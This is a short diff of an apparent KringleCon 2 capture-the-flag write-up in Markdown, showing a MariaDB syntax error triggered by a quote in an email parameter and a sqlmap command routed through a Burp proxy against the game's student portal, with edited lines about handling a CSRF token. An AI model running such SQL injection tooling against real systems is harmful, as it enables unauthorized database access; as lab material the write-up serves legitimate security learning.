pollev/Kringlecon-2-Turtle-Doves/index.md

 Error: SELECT status FROM applications WHERE elfmail = 'testelf@gmail.com'';<br>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''testelf@gmail.com''' at line 1
 ```

 Excellent.
-We can now let sqlmap work it's magic on this endpoint through burp.
+We can now let sqlmap work its magic on this endpoint through burp.
-Note the `--proxy` flag to allow burp to work its magic.
+Note the `--proxy` flag to allow burp to handle the csrf token.

 ```
 root@pv-kali:~# sqlmap --proxy=http://localhost:8080 --url="https://studentportal.elfu.org/application-check.php?elfmail=testelf%40gmail.com&token=blah" -p elfmail